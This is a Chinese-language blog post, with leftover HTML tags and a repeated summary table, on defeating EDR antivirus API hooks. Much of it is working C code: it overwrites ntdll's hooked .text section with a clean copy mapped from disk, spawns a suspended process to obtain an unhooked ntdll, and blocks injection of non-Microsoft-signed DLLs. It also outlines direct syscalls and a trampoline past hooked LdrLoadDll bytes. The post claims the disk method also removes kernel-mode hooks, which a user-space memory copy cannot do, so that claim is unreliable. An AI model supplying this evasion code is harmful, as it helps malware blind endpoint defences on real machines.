杀毒软件脱钩(Unhoo)技术研究与实践<\/h1>

前言<\/h2>
API Hook是安全产品(如EDR)常用的技术手段，通过替换操作系统中的API函数来拦截对这些函数的调用。在Windows系统中，许多关键函数(如CreateFile、ReadFile、LoadLibrary等)是通过DLL导出实现的。EDR会修改目标DLL中的函数入口，通常是将函数开头几个字节改为跳转指令(JMP)，使程序执行跳转到EDR的检测函数中，从而在API被调用前执行额外检查。<\/p>

EDR Hook机制分析<\/h2>

注入机制观察<\/h3>

通过Bitdefender观察发现EDR会将两个DLL注入到进程中<\/li>
将测试程序加入白名单后，EDR不再注入DLL<\/li>

对比分析发现：

对用户态(3环)函数有Hook<\/li>

对内核态(0环)函数也有Hook<\/li> <\/ul> <\/li> <\/ol>

阻止DLL注入尝试<\/h3>

Windows提供了SetProcessMitigationPolicy<\/code>函数来限制DLL注入：<\/p>

#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(){
<\/span><\/span>    PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY pmbsp =<\/span> { 0<\/span> };
<\/span><\/span>    pmbsp.StoreSignedOnly =<\/span> false;
<\/span><\/span>    pmbsp.MicrosoftSignedOnly =<\/span> true;
<\/span><\/span>    
<\/span><\/span>    BOOL result =<\/span> SetProcessMitigationPolicy(ProcessSignaturePolicy, &<\/span>pmbsp, sizeof<\/span>(pmbsp));
<\/span><\/span>    
<\/span><\/span>    if<\/span> (!<\/span>result) {
<\/span><\/span>        MessageBox(NULL, "False"<\/span>, "False"<\/span>, MB_OK);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    MessageBox(NULL, "Success"<\/span>, "Success"<\/span>, MB_OK);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>问题<\/strong>：EDR的DLL可能带有微软签名，此方法失效。<\/p>
脱钩技术实践<\/h2>
方法一：直接系统调用<\/h3>

绕过用户态Hook直接调用内核函数

如VirtualAlloc<\/code>最终调用NtAllocateVirtualMemory<\/code><\/li>
直接使用syscall<\/code>指令调用系统调用<\/li>
<\/ul>
<\/li>
<\/ol>
缺点<\/strong>：堆栈不正常，可能被检测<\/p>
方法二：磁盘重载ntdll<\/h3>
从磁盘加载干净DLL，替换内存中被Hook的.text节：<\/p>
void<\/span> UnHookDll<\/span>(LPCSTR dllname) {
<\/span><\/span>    MODULEINFO mi =<\/span> {};
<\/span><\/span>    HMODULE ntdllModule =<\/span> GetModuleHandleA(dllname);
<\/span><\/span>    GetModuleInformation(HANDLE(-<\/span>1<\/span>), ntdllModule, &<\/span>mi, sizeof<\/span>(mi));
<\/span><\/span>    
<\/span><\/span>    char<\/span> dllpath[MAX_PATH] =<\/span> { 0<\/span> };
<\/span><\/span>    LPVOID ntdllBase =<\/span> (LPVOID)mi.lpBaseOfDll;
<\/span><\/span>    sprintf_s(dllpath, "c:<\/span>\\<\/span>windows<\/span>\\<\/span>system32<\/span>\\<\/span>%s"<\/span>, dllname);
<\/span><\/span>    
<\/span><\/span>    HANDLE ntdllFile =<\/span> CreateFileA((LPCSTR)dllpath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0<\/span>, NULL);
<\/span><\/span>    HANDLE ntdllMapping =<\/span> CreateFileMapping(ntdllFile, NULL, PAGE_READONLY |<\/span> SEC_IMAGE, 0<\/span>, 0<\/span>, NULL);
<\/span><\/span>    LPVOID ntdllMappingAddress =<\/span> MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0<\/span>, 0<\/span>, 0<\/span>);
<\/span><\/span>    
<\/span><\/span>    PIMAGE_DOS_HEADER hookedDosHeader =<\/span> (PIMAGE_DOS_HEADER)ntdllBase;
<\/span><\/span>    PIMAGE_NT_HEADERS hookedNtHeader =<\/span> (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase +<\/span> hookedDosHeader-><\/span>e_lfanew);
<\/span><\/span>    
<\/span><\/span>    for<\/span> (WORD i =<\/span> 0<\/span>; i <<\/span> hookedNtHeader-><\/span>FileHeader.NumberOfSections; i++<\/span>) {
<\/span><\/span>        PIMAGE_SECTION_HEADER hookedSectionHeader =<\/span> (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) +<\/span> ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER *<\/span> i));
<\/span><\/span>        
<\/span><\/span>        if<\/span> (!<\/span>strcmp((char<\/span>*<\/span>)hookedSectionHeader-><\/span>Name, (char<\/span>*<\/span>)".text"<\/span>)) {
<\/span><\/span>            DWORD oldProtection =<\/span> 0<\/span>;
<\/span><\/span>            SIZE_T virtualSize =<\/span> hookedSectionHeader-><\/span>Misc.VirtualSize;
<\/span><\/span>            
<\/span><\/span>            VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase +<\/span> (DWORD_PTR)hookedSectionHeader-><\/span>VirtualAddress), 
<\/span><\/span>                          hookedSectionHeader-><\/span>Misc.VirtualSize, 
<\/span><\/span>                          PAGE_EXECUTE_READWRITE, 
<\/span><\/span>                          &<\/span>oldProtection);
<\/span><\/span>            
<\/span><\/span>            memcpy((LPVOID)((DWORD_PTR)ntdllBase +<\/span> (DWORD_PTR)hookedSectionHeader-><\/span>VirtualAddress), 
<\/span><\/span>                   (LPVOID)((DWORD_PTR)ntdllMappingAddress +<\/span> (DWORD_PTR)hookedSectionHeader-><\/span>VirtualAddress), 
<\/span><\/span>                   hookedSectionHeader-><\/span>Misc.VirtualSize);
<\/span><\/span>            
<\/span><\/span>            VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase +<\/span> (DWORD_PTR)hookedSectionHeader-><\/span>VirtualAddress), 
<\/span><\/span>                          hookedSectionHeader-><\/span>Misc.VirtualSize, 
<\/span><\/span>                          oldProtection, 
<\/span><\/span>                          &<\/span>oldProtection);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    CloseHandle(ntdllFile);
<\/span><\/span>    CloseHandle(ntdllMapping);
<\/span><\/span>    FreeLibrary(ntdllModule);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>效果<\/strong>：成功脱钩用户态和内核态函数<\/p>
方法三：挂起进程获取干净ntdll<\/h3>
创建挂起进程获取未Hook的ntdll：<\/p>
#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(){
<\/span><\/span>    STARTUPINFOA si =<\/span> { 0<\/span> };
<\/span><\/span>    PROCESS_INFORMATION pi =<\/span> { 0<\/span> };
<\/span><\/span>    si.cb =<\/span> sizeof<\/span>(STARTUPINFOA);
<\/span><\/span>    
<\/span><\/span>    BOOL result =<\/span> CreateProcessA("C:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>notepad.exe"<\/span>, 
<\/span><\/span>                                NULL, NULL, NULL, FALSE, 
<\/span><\/span>                                CREATE_SUSPENDED |<\/span> CREATE_NEW_CONSOLE, 
<\/span><\/span>                                NULL, NULL, &<\/span>si, &<\/span>pi);
<\/span><\/span>    
<\/span><\/span>    if<\/span> (!<\/span>result) {
<\/span><\/span>        MessageBox(NULL, "False"<\/span>, "False"<\/span>, MB_OK);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    MessageBox(NULL, "Success CREATE_SUSPENDED"<\/span>, "Success CREATE_SUSPENDED"<\/span>, MB_OK);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>特点<\/strong>：<\/p>

挂起的进程只有ntdll.dll，没有EDR的DLL<\/li>
同一系统上不同程序的ntdll基址相同<\/li>
获取的ntdll未被Hook<\/li>
<\/ul>
限制<\/strong>：仅适用于ntdll，不适用于kernel32.dll和KernelBase.dll<\/p>
参考实现<\/strong>：PerunsFart<\/a><\/p>
方法四：自定义跳转函数unhook<\/h3>
绕过EDR的JMP Hook：<\/p>


定义跳转指令结构：<\/p>

jumpPrelude[] = { 0x49, 0xBB }<\/code> - 64位mov指令<\/li>
jumpAddress[]<\/code> - 占位符(8字节)<\/li>
jumpEpilogue[] = { 0x41, 0xFF, 0xE3, 0xC3 }<\/code> - 跳转和返回指令<\/li>
<\/ul>
<\/li>

实现步骤：<\/p>

获取LdrLoadDll函数地址<\/li>
将LdrLoadDll地址+5字节后的地址放入jmpAddr<\/li>
申请内存保存原始函数前5字节<\/li>
构造跳转指令<\/li>
修改内存属性为可执行<\/li>
使用新函数加载DLL<\/li>
<\/ul>
<\/li>
<\/ol>
原理<\/strong>：复制原始函数前5字节，避免EDR的Hook，然后跳转到原始函数+5字节处继续执行<\/p>
总结<\/h2>



方法<\/th>
优点<\/th>
缺点<\/th>
<\/tr>
<\/thead>


直接系统调用<\/td>
简单直接<\/td>
堆栈不正常易被检测<\/td>
<\/tr>

磁盘重载ntdll<\/td>
完全脱钩<\/td>
需要处理内存保护<\/td>
<\/tr>

挂起进程法<\/td>
获取干净ntdll<\/td>
仅适用于ntdll<\/td>
<\/tr>

自定义跳转<\/td>
精确控制<\/td>
实现较复杂<\/td>
<\/tr>
<\/tbody>
<\/table>
选择合适的方法需根据具体场景和EDR的检测机制。这些技术对于研究EDR行为和安全防护有重要参考价值。<\/p>

方法<\/th>	优点<\/th>	缺点<\/th> <\/tr> <\/thead>
直接系统调用<\/td>	简单直接<\/td>	堆栈不正常易被检测<\/td> <\/tr>
磁盘重载ntdll<\/td>	完全脱钩<\/td>	需要处理内存保护<\/td> <\/tr>
挂起进程法<\/td>	获取干净ntdll<\/td>	仅适用于ntdll<\/td> <\/tr>
自定义跳转<\/td>	精确控制<\/td>	实现较复杂<\/td> <\/tr> <\/tbody> <\/table> 选择合适的方法需根据具体场景和EDR的检测机制。这些技术对于研究EDR行为和安全防护有重要参考价值。<\/p>